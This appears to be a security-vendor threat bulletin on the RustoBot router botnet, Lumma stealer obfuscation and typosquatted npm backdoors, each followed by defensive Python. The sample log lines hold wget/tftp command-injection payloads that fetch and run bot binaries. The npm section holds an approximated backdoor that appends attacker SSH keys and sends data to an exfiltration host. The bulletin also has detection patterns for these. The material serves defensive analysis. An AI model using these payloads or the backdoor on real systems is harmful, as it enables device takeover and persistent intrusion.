TRENDING TOPICS APR 22, 2025

RustoBot Targets Routers for DDoS in Growing Global Campaign 

RustoBot is a recently discovered malware strain that exploits known command-injection vulnerabilities in TOTOLINK and DrayTek routers to build a botnet for Distributed Denial of Service (DDoS) attacks. The activity was observed between January and February 2025. The exploited entry points are TOTOLINK's cstecgi.cgi and DrayTek's apmcfgupload web-interface handlers, which let an unauthenticated remote attacker execute system-level commands on the device. After exploitation, RustoBot uses utilities already present on the router, such as wget and tftp, to fetch a downloader and the bot payload. Payloads are built for several CPU architectures (ARMv5 through ARMv7, MIPS, little-endian MIPS (MPSL) and x86), so a single campaign can infect the mix of embedded hardware typically found at the network edge; the architecture-aware payloads are about breadth of infection, not lateral movement.
Once running, the malware decodes an XOR-obfuscated configuration using a key generated at runtime, which keeps the plaintext C2 domains and other strings out of the binary and defeats naive string-based signatures. The decoded configuration names the command-and-control (C2) domains, from which the bot then takes DDoS instructions. This combination of obfuscation and live infrastructure points to a maintained, modular threat rather than a one-off. RustoBot supports raw IP packet floods, TCP floods and high-volume UDP floods. Each attack is initiated by a structured command from the C2 server that specifies the target IPs, port ranges, packet sizes and duration, so operators can tailor an attack to the victim.
Campaigns have been reported in Japan, Taiwan, Vietnam and Mexico, targeting organizations in the technology sector that depend on the affected routers for connectivity. Because the infected devices are edge routers, the impact is not limited to the DDoS traffic they generate: a compromised router is also a persistent foothold from which an attacker can pivot into the network behind it.
In response, FortiGuard Labs has released antivirus signatures (e.g., BASH/Mirai.AEH!tr.dldr), IPS coverage for the exploited vulnerabilities and web filtering that blocks the C2 domains. Organizations should patch affected TOTOLINK and DrayTek devices, keep router management interfaces off the public internet and behind access controls, and monitor edge traffic for anomalies, in particular unexpected outbound connections and payload downloads originating from the router itself.
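As an added example (not from the FortiGuard report), the following Python triage script applies the two observable traits described above to web-server access logs from a router, or from a reverse proxy in front of one: a request to one of the exploited CGI paths whose parameters carry shell operators, or that names a download utility such as wget or tftp. A plain request to those endpoints is deliberately not flagged, since that is ordinary administrative traffic. The log lines, parameter names and payload filenames are constructed for the example, and the busybox pattern is an assumption added here.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Web-interface paths the report names as the exploited entry points.
TARGET_PATHS = ("cstecgi.cgi", "apmcfgupload")

# Shell operators that have no business inside a router CGI parameter.
# A single '&' is deliberately excluded: it separates ordinary query parameters.
SHELL_META = re.compile(r"[;|`]|&&|\$\(")

# Utilities the report says the bot stages its payloads with.
# 'busybox' is an assumption added here: embedded targets often expose
# wget/tftp only as busybox applets.
FETCH_TOOL = re.compile(r"\b(wget|tftp|busybox)\b", re.IGNORECASE)

REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)')


def flag_request(line: str) -> List[str]:
    """Return the reasons one access-log line looks like an injection attempt
    against the exploited CGI endpoints, or [] if nothing stands out."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = unquote(m.group(1))            # decode %3B, %20, %60 ... once
    if not any(p in url for p in TARGET_PATHS):
        return []
    reasons = []
    if SHELL_META.search(url):
        reasons.append("shell operator in request to exploited CGI path")
    if FETCH_TOOL.search(url):
        reasons.append("payload download utility in request parameters")
    return reasons


def triage(log_lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Run flag_request over a log and return (index, source IP, reasons)
    for every line that was flagged."""
    hits = []
    for i, line in enumerate(log_lines):
        reasons = flag_request(line)
        if reasons:
            hits.append((i, line.split(" ", 1)[0], reasons))
    return hits


# Constructed sample log (Apache combined format, RFC 5737 test addresses).
# The parameter names and payload filenames are invented for illustration.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Feb/2025:03:12:41 +0000] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Feb/2025:03:13:02 +0000] "GET /cgi-bin/cstecgi.cgi?host=1.1.1.1%3Bwget%20http%3A%2F%2F192.0.2.10%2Fbot.mips%3Bsh%20bot.mips HTTP/1.1" 200 64',
    '198.51.100.7 - - [15/Feb/2025:03:13:09 +0000] "GET /cgi-bin/apmcfgupload?session=x%60tftp%20-g%20-r%20bot.arm7%20192.0.2.10%60 HTTP/1.1" 500 0',
    '192.0.2.44 - - [15/Feb/2025:03:14:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for idx, src, why in triage(SAMPLE_LOG):
        print(f"line {idx} from {src}: {'; '.join(why)}")
```

Decoding the request once before matching matters: exploit traffic arrives percent-encoded, so `;` and the backtick show up in the raw log as %3B and %60 and a pattern written against the literal characters would miss them.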

Update: Lumma InfoStealer Evolves with Code Flow Obfuscation to Evade Detection 

A newly identified Lumma InfoStealer variant adds code flow (control-flow) obfuscation, a technique aimed at the analyst rather than the victim: it exists to hinder static analysis and reverse engineering. The obfuscation rewrites the program's control flow by inserting decoy logic paths that are never taken, routing execution through layers of nested dispatch structures so that the real sequence of operations is no longer visible in the code's layout, and adding anti-debugging checks that disrupt both human inspection and automated sandboxes. The infection chain and the stealer's capabilities are structurally the same as in previous versions; what has changed is how hard the sample is to read. Because byte-level and structural signatures key on the shape of the code, static antivirus matching is weakened, and credential theft and data exfiltration can proceed during the early stage of an infection before updated signatures exist. The shift is a deliberate trade of delivery volume for stealth and persistence.
For defenders the practical consequence is that detection has to move toward behavior. Since the built-in anti-debugging logic can disrupt dynamic sandboxing as well, security teams should lean on behavioral analytics, heuristic detection, memory-level monitoring and continuous telemetry analysis, which observe what the malware does (credential access, data collection, outbound exfiltration) regardless of how its code is arranged. Traditional tooling may not identify this variant until after the initial compromise, which raises the risk to enterprise networks and end-user environments alike. The variant also reflects a broader trend: commodity obfuscation and packing tooling has lowered the barrier to deploying highly evasive malware, so the stealth seen here should be expected from other commodity malware families. Security strategies that still depend on static matching alone will fall behind.
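To make concrete what control-flow obfuscation does to a reader, here is an added illustration in Python (not Lumma's code and not a reproduction of its specific technique): a small XOR decode routine written plainly, then the same routine with its control flow flattened into a state-machine dispatcher, a computed back-edge transition, and a dead branch guarded by an opaque predicate. Both return identical bytes, which is the point: the behaviour survives intact while the shape that a static signature or a human reader depends on is gone, and the only cheap way to learn what the flattened version does is to run it.

```python
from typing import Iterable, Tuple


def decode_plain(blob: bytes, key: bytes) -> bytes:
    """Readable version: one loop, one obvious exit, trivial to sign or lift."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def _opaque_true(x: int) -> bool:
    """Opaque predicate: true for every integer (x*(x+1) is always even),
    but a disassembler cannot see that, so the branch it guards looks live."""
    return (x * (x + 1)) % 2 == 0


def decode_flattened(blob: bytes, key: bytes) -> bytes:
    """Same function after control-flow flattening: every basic block is a
    case in a dispatcher loop, the loop back-edge is a computed transition
    rather than a literal assignment, and a dead block behind the opaque
    predicate pads the graph with logic that never runs."""
    INIT, LOOP, BODY, DEAD, DONE = 0x11, 0x2A, 0x5C, 0x3F, 0x7D
    state, i, out = INIT, 0, bytearray()
    while True:
        if state == INIT:
            state = LOOP if _opaque_true(i) else DEAD
        elif state == LOOP:
            state = BODY if i < len(blob) else DONE
        elif state == BODY:
            out.append(blob[i] ^ key[i % len(key)])
            i += 1
            state ^= 0x76            # 0x5C ^ 0x76 == 0x2A: back to LOOP, computed
        elif state == DEAD:          # decoy path: never reached
            out = bytearray(b"\xff" * len(blob))
            state = DONE
        elif state == DONE:
            return bytes(out)


def behaves_identically(samples: Iterable[Tuple[bytes, bytes]]) -> bool:
    """Dynamic check: run both versions on the same inputs and compare.
    Observing behaviour is what remains reliable once the code's shape is
    gone, which is why detection shifts from static to behavioral."""
    return all(decode_plain(b, k) == decode_flattened(b, k) for b, k in samples)


if __name__ == "__main__":
    cases = [(b"", b"k"), (b"\x01\x02\x03", b"\x0f"), (b"credentials.db", b"lumma")]
    print("identical behaviour:", behaves_identically(cases))
```

Real obfuscators apply the same transformation to every function, pick state values per build and often hide the dispatcher behind indirect jumps, so the decompiler output a signature author works from looks nothing like the plain version. Nothing about the decode result changes, and a behavioral detection that watches the bytes being produced or the files being read is unaffected.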

Update: Malicious npm Packages Exploit Telegram API to Backdoor Linux Developer Systems 

A recent wave of supply chain attacks on the open-source JavaScript ecosystem used malicious npm packages to backdoor Linux systems. The actors published typosquatted packages impersonating the popular Telegram bot library node-telegram-bot-api under look-alike names, including node-telegram-utils, node-telegram-bots-api and node-telegram-util. On Linux hosts the packages execute a function, addBotId(), that silently appends two attacker-controlled SSH public keys to the user's .ssh/authorized_keys file. That gives the attacker persistent, passwordless SSH access to the machine, and because the keys live in the user's home directory rather than in node_modules, uninstalling the package does not remove the backdoor. The malicious code is buried in otherwise benign-looking modules, so it is rarely noticed at install time. The same code harvests the host's external IP address (via ipinfo[.]io) and the username and exfiltrates them to a server at solana[.]validator[.]blog, giving the attacker an inventory of compromised hosts to revisit or to use as entry points for lateral movement into the victim's wider infrastructure.
The incident illustrates a familiar weakness of software supply chains: a name that resembles a trusted module is adopted with minimal scrutiny, and the registry does little to stop look-alike packages from blending in with legitimate projects. Because these campaigns increasingly use obfuscation to evade detection, developers are urged to pin and review dependencies, treat .ssh/authorized_keys as a monitored file whose every entry must be accounted for, and add real-time dependency monitoring and behavioral analysis tools such as those provided by Socket. A single developer workstation with an attacker's key in authorized_keys is a foothold into the enterprise, which is why security has to be integrated into the development lifecycle itself.
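Two checks a defender can run, as an added example in Python that is not Socket's code and not the packages' own: an audit of .ssh/authorized_keys that fingerprints every entry the way ssh-keygen -lf does and reports any key not on an allowlist (this catches the backdoor even after the package has been uninstalled), and a string-indicator scan of package source for the artefacts named above. The sample authorized_keys file, its keys and the snippet of package source are constructed for the example; the keys are byte patterns, not real keys, and the snippet only approximates the behaviour described.

```python
import base64
import binascii
import hashlib
import re
from typing import List, Optional, Set

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(entry: str) -> Optional[str]:
    """SHA256 fingerprint of one authorized_keys entry, formatted as
    `ssh-keygen -lf` prints it (base64 without '=' padding). Leading options
    such as 'no-pty' or 'command="..."' are skipped. Returns None when the
    line holds no key-type / blob pair or the blob is not valid base64."""
    fields = entry.split()
    for i, f in enumerate(fields):
        if f.startswith(KEY_TYPE_PREFIXES) and i + 1 < len(fields):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except binascii.Error:
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None


def audit_authorized_keys(text: str, allowed: Set[str]) -> List[str]:
    """Return one finding per entry that is not accounted for: the fingerprint
    of any key missing from the allowlist, or the raw line if it cannot be
    parsed. Comments and blank lines are ignored."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = fingerprint(line)
        if fp is None:
            findings.append("unparseable entry: " + line)
        elif fp not in allowed:
            findings.append(fp)
    return findings


# Strings the report associates with the backdoor. A match is a triage
# signal, not proof: legitimate tooling can also touch ~/.ssh.
INDICATORS = {
    "authorized_keys": re.compile(r"authorized_keys"),
    "ssh-dir": re.compile(r"\.ssh[/\\]"),
    "ipinfo": re.compile(r"ipinfo\.io"),
    "exfil-host": re.compile(r"solana\.validator\.blog"),
}


def scan_package_source(src: str) -> List[str]:
    """Names of the indicators found in a package's source text."""
    return [name for name, pat in INDICATORS.items() if pat.search(src)]


def _fake_ed25519(seed: int) -> str:
    """Build a syntactically valid ssh-ed25519 public key line for the sample
    file. The 32-byte 'point' is just a byte pattern, not a real key."""
    body = (b"\x00\x00\x00\x0bssh-ed25519"
            + b"\x00\x00\x00\x20" + bytes((seed + i) % 256 for i in range(32)))
    return "ssh-ed25519 " + base64.b64encode(body).decode()


DEV_KEY = _fake_ed25519(1)

# Constructed authorized_keys: one legitimate key plus the two entries a
# backdoor like addBotId() would append.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# developer's own key",
    DEV_KEY + " dev@laptop",
    _fake_ed25519(101) + " attacker-1",
    "no-pty " + _fake_ed25519(202) + " attacker-2",
])

# Constructed approximation of the backdoor, not the real package code; only
# the function name and the two hosts come from the report.
SAMPLE_PACKAGE_SRC = r"""
const fs = require('fs'); const os = require('os'); const https = require('https');
function addBotId() {
  if (os.platform() !== 'linux') return;
  fs.appendFileSync(os.homedir() + '/.ssh/authorized_keys', ATTACKER_KEYS.join('\n') + '\n');
  https.get('https://ipinfo.io/json', r => { /* collect external IP */ });
  https.get('https://solana.validator.blog/?u=' + os.userInfo().username);
}
"""

if __name__ == "__main__":
    allowlist = {fingerprint(DEV_KEY)}
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, allowlist):
        print("unexpected:", finding)
    print("indicators in package:", scan_package_source(SAMPLE_PACKAGE_SRC))
```

Keep the allowlist of fingerprints somewhere the package cannot write to (a configuration repository or an endpoint-management system), and run the audit on a schedule rather than only at install time: the report's point is that the keys outlive the package, so an authorized_keys entry with no matching fingerprint is the durable signal.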

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.